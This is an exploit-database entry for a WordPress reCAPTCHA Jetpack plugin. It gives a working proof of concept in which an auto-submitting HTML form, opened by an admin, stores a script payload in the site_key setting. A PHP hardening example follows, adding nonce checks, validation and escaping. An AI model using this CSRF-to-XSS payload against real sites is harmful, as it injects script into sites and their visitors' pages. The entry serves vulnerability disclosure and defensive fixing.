## https://sploitus.com/exploit?id=WPEX-ID:6E09E922-983C-4406-8053-747D839995D1
This requires Jetpack to be installed and a page/post that contains a Jetpack Contact Form.
Add a post/page containing a Jetpack Contact Form shortcode:
```
[contact-form][contact-field label="Name" type="name" required="true" /][contact-field label="Email" type="email" required="true" /][contact-field label="Message" type="textarea" /][/contact-form]
```
Once a form using Jetpack exists, make a logged-in admin open an HTML document containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=recaptcha-jetpack" method="post">
<input type="hidden" name="site_key" value='"><script>alert(4)</script>' />
<input type="hidden" name="secret_key" value='csrf2222' />
<input type="hidden" name="recaptcha_type" value="v2" />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" name="enter" id="enter" value="Submit">
</form>
</body>
```
View the post/page containing the form to see the XSS.
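
The PoC form carries no nonce, and its `site_key` value runs as script on the contact-form page, so the fix belongs on both the save path and the output path. A hardened settings handler as an added example (not the plugin's code; the `rj_*` function names, option keys, nonce action, key character set and the `v3` type are assumptions, while the field names and page slug come from the PoC):

```php
<?php
// Added illustration, not the plugin's code. The rj_* names, option keys and
// nonce action are hypothetical; field names and page slug are from the PoC.
const RJ_NONCE = 'rj_save_settings';

// Settings form body: the nonce is tied to the logged-in user and session,
// so a page on another origin cannot supply a valid _wpnonce value.
function rj_settings_fields() {
    wp_nonce_field( RJ_NONCE );
    foreach ( array( 'site_key', 'secret_key' ) as $name ) {
        printf(
            '<input type="text" name="%1$s" value="%2$s" />',
            esc_attr( $name ),
            esc_attr( get_option( 'rj_' . $name, '' ) )
        );
    }
}

function rj_save_settings() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || 'recaptcha-jetpack' !== ( $_GET['page'] ?? '' ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( RJ_NONCE ); // stops here when _wpnonce is absent or wrong

    $clean = array();
    foreach ( array( 'site_key', 'secret_key' ) as $name ) {
        $value = sanitize_text_field( wp_unslash( $_POST[ $name ] ?? '' ) );
        // Assumption: reCAPTCHA keys use only URL-safe base64 characters.
        if ( ! preg_match( '/^[A-Za-z0-9_-]*$/', $value ) ) {
            wp_die( 'Invalid reCAPTCHA key.' );
        }
        $clean[ $name ] = $value;
    }
    // Allow-list the type; "v3" is an assumed second value.
    $type = sanitize_key( wp_unslash( $_POST['recaptcha_type'] ?? '' ) );
    $clean['type'] = in_array( $type, array( 'v2', 'v3' ), true ) ? $type : 'v2';

    // Store only after every field has passed validation.
    foreach ( $clean as $name => $value ) {
        update_option( 'rj_' . $name, $value );
    }
}
add_action( 'admin_init', 'rj_save_settings' );

// Front-end output: escape for the attribute context even though the stored
// value was validated, so a value written by another path cannot break out.
function rj_widget_html() {
    return sprintf( '<div class="g-recaptcha" data-sitekey="%s"></div>', esc_attr( get_option( 'rj_site_key', '' ) ) );
}
```

With these checks the auto-submitting form is rejected at `check_admin_referer()`, and a value such as the one in the PoC would fail the character check and be attribute-escaped on output.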